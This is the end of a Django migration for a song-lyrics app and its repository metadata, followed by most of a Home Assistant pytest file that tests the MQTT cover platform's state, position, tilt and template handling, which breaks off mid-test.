('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('song_name', models.CharField(max_length=30, verbose_name='Song name')),
('song_lyrics', models.TextField(verbose_name='Lyrics')),
('artist', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='songs_artists.Band', verbose_name='Artist')),
],
options={
'verbose_name': 'Song',
'verbose_name_plural': 'Songs',
},
),
]
|
{
"content_hash": "e37e0f91221f8057b908baac2674e639",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 139,
"avg_line_length": 36.75609756097561,
"alnum_prop": 0.5461181154611812,
"repo_name": "forever-Agriculture/lyrics_site",
"id": "0ff67c15b970e905bd3fcc952480971a8a84fc9f",
"size": "1580",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/apps/songs_artists/migrations/0001_initial.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "56"
},
{
"name": "Elixir",
"bytes": "3002"
},
{
"name": "HTML",
"bytes": "18146"
},
{
"name": "Makefile",
"bytes": "1586"
},
{
"name": "Nginx",
"bytes": "1546"
},
{
"name": "Python",
"bytes": "15905"
},
{
"name": "Shell",
"bytes": "19047"
}
],
"symlink_target": ""
}
|
"""The tests for the MQTT cover platform."""
from unittest.mock import patch
import pytest
from homeassistant.components import cover
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_CURRENT_TILT_POSITION,
ATTR_POSITION,
ATTR_TILT_POSITION,
)
from homeassistant.components.mqtt import CONF_STATE_TOPIC
from homeassistant.components.mqtt.cover import (
CONF_GET_POSITION_TEMPLATE,
CONF_GET_POSITION_TOPIC,
CONF_SET_POSITION_TEMPLATE,
CONF_SET_POSITION_TOPIC,
CONF_TILT_COMMAND_TEMPLATE,
CONF_TILT_COMMAND_TOPIC,
CONF_TILT_STATUS_TEMPLATE,
CONF_TILT_STATUS_TOPIC,
MQTT_COVER_ATTRIBUTES_BLOCKED,
MqttCover,
)
from homeassistant.const import (
ATTR_ASSUMED_STATE,
ATTR_ENTITY_ID,
CONF_VALUE_TEMPLATE,
SERVICE_CLOSE_COVER,
SERVICE_CLOSE_COVER_TILT,
SERVICE_OPEN_COVER,
SERVICE_OPEN_COVER_TILT,
SERVICE_SET_COVER_POSITION,
SERVICE_SET_COVER_TILT_POSITION,
SERVICE_STOP_COVER,
SERVICE_TOGGLE,
SERVICE_TOGGLE_COVER_TILT,
STATE_CLOSED,
STATE_CLOSING,
STATE_OPEN,
STATE_OPENING,
STATE_UNKNOWN,
)
from homeassistant.setup import async_setup_component
from .test_common import (
help_test_availability_when_connection_lost,
help_test_availability_without_topic,
help_test_custom_availability_payload,
help_test_default_availability_payload,
help_test_discovery_broken,
help_test_discovery_removal,
help_test_discovery_update,
help_test_discovery_update_attr,
help_test_discovery_update_unchanged,
help_test_entity_debug_info_message,
help_test_entity_device_info_remove,
help_test_entity_device_info_update,
help_test_entity_device_info_with_connection,
help_test_entity_device_info_with_identifier,
help_test_entity_id_update_discovery_update,
help_test_entity_id_update_subscriptions,
help_test_setting_attribute_via_mqtt_json_message,
help_test_setting_attribute_with_template,
help_test_setting_blocked_attribute_via_mqtt_json_message,
help_test_unique_id,
help_test_update_with_json_attrs_bad_JSON,
help_test_update_with_json_attrs_not_dict,
)
from tests.common import async_fire_mqtt_message
DEFAULT_CONFIG = {
cover.DOMAIN: {"platform": "mqtt", "name": "test", "state_topic": "test-topic"}
}
async def test_state_via_state_topic(hass, mqtt_mock):
"""Test the controlling state via topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "state-topic", STATE_CLOSED)
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "state-topic", STATE_OPEN)
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async def test_opening_and_closing_state_via_custom_state_payload(hass, mqtt_mock):
"""Test the controlling opening and closing state via a custom payload."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"state_opening": "34",
"state_closing": "--43",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "state-topic", "34")
state = hass.states.get("cover.test")
assert state.state == STATE_OPENING
async_fire_mqtt_message(hass, "state-topic", "--43")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSING
async_fire_mqtt_message(hass, "state-topic", STATE_CLOSED)
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async def test_open_closed_state_from_position_optimistic(hass, mqtt_mock):
"""Test the state after setting the position using optimistic mode."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "position-topic",
"set_position_topic": "set-position-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"optimistic": True,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 0},
blocking=True,
)
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
assert state.attributes.get(ATTR_ASSUMED_STATE)
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 100},
blocking=True,
)
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
assert state.attributes.get(ATTR_ASSUMED_STATE)
async def test_position_via_position_topic(hass, mqtt_mock):
"""Test the controlling state via topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"position_open": 100,
"position_closed": 0,
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "get-position-topic", "0")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "get-position-topic", "100")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async def test_state_via_template(hass, mqtt_mock):
"""Test the controlling state via topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"value_template": "\
{% if (value | multiply(0.01) | int) == 0 %}\
closed\
{% else %}\
open\
{% endif %}",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async_fire_mqtt_message(hass, "state-topic", "10000")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "state-topic", "99")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async def test_state_via_template_and_entity_id(hass, mqtt_mock):
"""Test the controlling state via topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"value_template": '\
{% if value == "open" or value == "closed" %}\
{{ value }}\
{% else %}\
{{ states(entity_id) }}\
{% endif %}',
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async_fire_mqtt_message(hass, "state-topic", "open")
async_fire_mqtt_message(hass, "state-topic", "invalid")
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(hass, "state-topic", "closed")
async_fire_mqtt_message(hass, "state-topic", "invalid")
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async def test_state_via_template_with_json_value(hass, mqtt_mock, caplog):
"""Test the controlling state via topic with JSON value."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"value_template": "{{ value_json.Var1 }}",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async_fire_mqtt_message(hass, "state-topic", '{ "Var1": "open", "Var2": "other" }')
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
async_fire_mqtt_message(
hass, "state-topic", '{ "Var1": "closed", "Var2": "other" }'
)
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async_fire_mqtt_message(hass, "state-topic", '{ "Var2": "other" }')
assert (
"Template variable warning: 'dict object' has no attribute 'Var1' when rendering"
) in caplog.text
async def test_position_via_template_and_entity_id(hass, mqtt_mock):
"""Test the controlling state via topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"qos": 0,
"position_template": '\
{% if state_attr(entity_id, "current_position") == None %}\
{{ value }}\
{% else %}\
{{ state_attr(entity_id, "current_position") + value | int }}\
{% endif %}',
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async_fire_mqtt_message(hass, "get-position-topic", "10")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 10
async_fire_mqtt_message(hass, "get-position-topic", "10")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 20
@pytest.mark.parametrize(
"config, assumed_state",
[
({"command_topic": "abc"}, True),
({"command_topic": "abc", "state_topic": "abc"}, False),
# ({"set_position_topic": "abc"}, True), - not a valid configuration
({"set_position_topic": "abc", "position_topic": "abc"}, False),
({"tilt_command_topic": "abc"}, True),
({"tilt_command_topic": "abc", "tilt_status_topic": "abc"}, False),
],
)
async def test_optimistic_flag(hass, mqtt_mock, config, assumed_state):
"""Test assumed_state is set correctly."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{cover.DOMAIN: {**config, "platform": "mqtt", "name": "test", "qos": 0}},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
if assumed_state:
assert ATTR_ASSUMED_STATE in state.attributes
else:
assert ATTR_ASSUMED_STATE not in state.attributes
async def test_optimistic_state_change(hass, mqtt_mock):
"""Test changing state optimistically."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"qos": 0,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert state.attributes.get(ATTR_ASSUMED_STATE)
await hass.services.async_call(
cover.DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
mqtt_mock.async_publish.reset_mock()
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
await hass.services.async_call(
cover.DOMAIN, SERVICE_CLOSE_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
mqtt_mock.async_publish.reset_mock()
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
await hass.services.async_call(
cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
mqtt_mock.async_publish.reset_mock()
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
await hass.services.async_call(
cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
async def test_optimistic_state_change_with_position(hass, mqtt_mock):
"""Test changing state optimistically."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"optimistic": True,
"command_topic": "command-topic",
"position_topic": "position-topic",
"qos": 0,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
assert state.attributes.get(ATTR_ASSUMED_STATE)
assert state.attributes.get(ATTR_CURRENT_POSITION) is None
await hass.services.async_call(
cover.DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
mqtt_mock.async_publish.reset_mock()
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
assert state.attributes.get(ATTR_CURRENT_POSITION) == 100
await hass.services.async_call(
cover.DOMAIN, SERVICE_CLOSE_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
mqtt_mock.async_publish.reset_mock()
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
assert state.attributes.get(ATTR_CURRENT_POSITION) == 0
await hass.services.async_call(
cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 0, False)
mqtt_mock.async_publish.reset_mock()
state = hass.states.get("cover.test")
assert state.state == STATE_OPEN
assert state.attributes.get(ATTR_CURRENT_POSITION) == 100
await hass.services.async_call(
cover.DOMAIN, SERVICE_TOGGLE, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 0, False)
state = hass.states.get("cover.test")
assert state.state == STATE_CLOSED
assert state.attributes.get(ATTR_CURRENT_POSITION) == 0
async def test_send_open_cover_command(hass, mqtt_mock):
"""Test the sending of open_cover."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 2,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
await hass.services.async_call(
cover.DOMAIN, SERVICE_OPEN_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "OPEN", 2, False)
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async def test_send_close_cover_command(hass, mqtt_mock):
"""Test the sending of close_cover."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 2,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
await hass.services.async_call(
cover.DOMAIN, SERVICE_CLOSE_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "CLOSE", 2, False)
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async def test_send_stop__cover_command(hass, mqtt_mock):
"""Test the sending of stop_cover."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 2,
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
await hass.services.async_call(
cover.DOMAIN, SERVICE_STOP_COVER, {ATTR_ENTITY_ID: "cover.test"}, blocking=True
)
mqtt_mock.async_publish.assert_called_once_with("command-topic", "STOP", 2, False)
state = hass.states.get("cover.test")
assert state.state == STATE_UNKNOWN
async def test_current_cover_position(hass, mqtt_mock):
"""Test the current cover position."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"position_open": 100,
"position_closed": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
state_attributes_dict = hass.states.get("cover.test").attributes
assert ATTR_CURRENT_POSITION not in state_attributes_dict
assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
assert 4 & hass.states.get("cover.test").attributes["supported_features"] != 4
async_fire_mqtt_message(hass, "get-position-topic", "0")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 0
async_fire_mqtt_message(hass, "get-position-topic", "50")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 50
async_fire_mqtt_message(hass, "get-position-topic", "non-numeric")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 50
async_fire_mqtt_message(hass, "get-position-topic", "101")
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 100
async def test_current_cover_position_inverted(hass, mqtt_mock):
"""Test the current cover position."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"position_open": 0,
"position_closed": 100,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
state_attributes_dict = hass.states.get("cover.test").attributes
assert ATTR_CURRENT_POSITION not in state_attributes_dict
assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
assert 4 & hass.states.get("cover.test").attributes["supported_features"] != 4
async_fire_mqtt_message(hass, "get-position-topic", "100")
current_percentage_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_percentage_cover_position == 0
assert hass.states.get("cover.test").state == STATE_CLOSED
async_fire_mqtt_message(hass, "get-position-topic", "0")
current_percentage_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_percentage_cover_position == 100
assert hass.states.get("cover.test").state == STATE_OPEN
async_fire_mqtt_message(hass, "get-position-topic", "50")
current_percentage_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_percentage_cover_position == 50
assert hass.states.get("cover.test").state == STATE_OPEN
async_fire_mqtt_message(hass, "get-position-topic", "non-numeric")
current_percentage_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_percentage_cover_position == 50
assert hass.states.get("cover.test").state == STATE_OPEN
async_fire_mqtt_message(hass, "get-position-topic", "101")
current_percentage_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_percentage_cover_position == 0
assert hass.states.get("cover.test").state == STATE_CLOSED
async def test_optimistic_position(hass, mqtt_mock):
"""Test optimistic position is not supported."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
}
},
)
await hass.async_block_till_done()
state = hass.states.get("cover.test")
assert state is None
async def test_position_update(hass, mqtt_mock):
"""Test cover position update from received MQTT message."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"set_position_topic": "set-position-topic",
"position_open": 100,
"position_closed": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
state_attributes_dict = hass.states.get("cover.test").attributes
assert ATTR_CURRENT_POSITION not in state_attributes_dict
assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
assert 4 & hass.states.get("cover.test").attributes["supported_features"] == 4
async_fire_mqtt_message(hass, "get-position-topic", "22")
state_attributes_dict = hass.states.get("cover.test").attributes
assert ATTR_CURRENT_POSITION in state_attributes_dict
assert ATTR_CURRENT_TILT_POSITION not in state_attributes_dict
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_POSITION
]
assert current_cover_position == 22
@pytest.mark.parametrize(
"pos_template,pos_call,pos_message",
[("{{position-1}}", 43, "42"), ("{{100-62}}", 100, "38")],
)
async def test_set_position_templated(
hass, mqtt_mock, pos_template, pos_call, pos_message
):
"""Test setting cover position via template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"position_open": 100,
"position_closed": 0,
"set_position_topic": "set-position-topic",
"set_position_template": pos_template,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: pos_call},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"set-position-topic", pos_message, 0, False
)
async def test_set_position_templated_and_attributes(hass, mqtt_mock):
"""Test setting cover position via template and using entities attributes."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"position_open": 100,
"position_closed": 0,
"set_position_topic": "set-position-topic",
"set_position_template": '\
{% if position > 99 %}\
{% if state_attr(entity_id, "current_position") == None %}\
{{ 5 }}\
{% else %}\
{{ 23 }}\
{% endif %}\
{% else %}\
{{ 42 }}\
{% endif %}',
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 100},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with("set-position-topic", "5", 0, False)
async def test_set_tilt_templated(hass, mqtt_mock):
"""Test setting cover tilt position via template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"tilt_command_topic": "tilt-command-topic",
"position_open": 100,
"position_closed": 0,
"set_position_topic": "set-position-topic",
"set_position_template": "{{position-1}}",
"tilt_command_template": "{{tilt_position+1}}",
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_TILT_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 41},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "42", 0, False
)
async def test_set_tilt_templated_and_attributes(hass, mqtt_mock):
"""Test setting cover tilt position via template and using entities attributes."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "get-position-topic",
"command_topic": "command-topic",
"tilt_command_topic": "tilt-command-topic",
"position_open": 100,
"position_closed": 0,
"set_position_topic": "set-position-topic",
"set_position_template": "{{position-1}}",
"tilt_command_template": '\
{% if state_attr(entity_id, "friendly_name") != "test" %}\
{{ 5 }}\
{% else %}\
{{ 23 }}\
{% endif %}',
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_TILT_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_TILT_POSITION: 99},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "23", 0, False
)
async def test_set_position_untemplated(hass, mqtt_mock):
"""Test setting cover position via template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "position-topic",
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 62},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with("position-topic", "62", 0, False)
async def test_set_position_untemplated_custom_percentage_range(hass, mqtt_mock):
"""Test setting cover position via template."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"position_topic": "state-topic",
"command_topic": "command-topic",
"set_position_topic": "position-topic",
"position_open": 0,
"position_closed": 100,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_SET_COVER_POSITION,
{ATTR_ENTITY_ID: "cover.test", ATTR_POSITION: 38},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with("position-topic", "62", 0, False)
async def test_no_command_topic(hass, mqtt_mock):
"""Test with no command topic."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command",
"tilt_status_topic": "tilt-status",
}
},
)
await hass.async_block_till_done()
assert hass.states.get("cover.test").attributes["supported_features"] == 240
async def test_no_payload_close(hass, mqtt_mock):
"""Test with no close payload."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": None,
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
assert hass.states.get("cover.test").attributes["supported_features"] == 9
async def test_no_payload_open(hass, mqtt_mock):
"""Test with no open payload."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"qos": 0,
"payload_open": None,
"payload_close": "CLOSE",
"payload_stop": "STOP",
}
},
)
await hass.async_block_till_done()
assert hass.states.get("cover.test").attributes["supported_features"] == 10
async def test_no_payload_stop(hass, mqtt_mock):
"""Test with no stop payload."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": None,
}
},
)
await hass.async_block_till_done()
assert hass.states.get("cover.test").attributes["supported_features"] == 3
async def test_with_command_topic_and_tilt(hass, mqtt_mock):
"""Test with command topic and tilt config."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"command_topic": "test",
"platform": "mqtt",
"name": "test",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command",
"tilt_status_topic": "tilt-status",
}
},
)
await hass.async_block_till_done()
assert hass.states.get("cover.test").attributes["supported_features"] == 251
async def test_tilt_defaults(hass, mqtt_mock):
"""Test the defaults."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command",
"tilt_status_topic": "tilt-status",
}
},
)
await hass.async_block_till_done()
state_attributes_dict = hass.states.get("cover.test").attributes
assert ATTR_CURRENT_TILT_POSITION in state_attributes_dict
current_cover_position = hass.states.get("cover.test").attributes[
ATTR_CURRENT_TILT_POSITION
]
assert current_cover_position == STATE_UNKNOWN
async def test_tilt_via_invocation_defaults(hass, mqtt_mock):
"""Test tilt defaults on close/open."""
assert await async_setup_component(
hass,
cover.DOMAIN,
{
cover.DOMAIN: {
"platform": "mqtt",
"name": "test",
"state_topic": "state-topic",
"command_topic": "command-topic",
"qos": 0,
"payload_open": "OPEN",
"payload_close": "CLOSE",
"payload_stop": "STOP",
"tilt_command_topic": "tilt-command-topic",
"tilt_status_topic": "tilt-status-topic",
}
},
)
await hass.async_block_till_done()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_OPEN_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with(
"tilt-command-topic", "100", 0, False
)
mqtt_mock.async_publish.reset_mock()
await hass.services.async_call(
cover.DOMAIN,
SERVICE_CLOSE_COVER_TILT,
{ATTR_ENTITY_ID: "cover.test"},
blocking=True,
)
mqtt_mock.async_publish.assert_called_once_with("tilt-command-topic", "0", 0, False)
mqtt_mock.async_publish.reset_mock()
# Close tilt status would be received from device when non-optimistic
async_fire_mqtt_message(hass, "tilt-status-topic", "0")
current_cover_tilt_position = hass.states.get("cover.test").attributes[
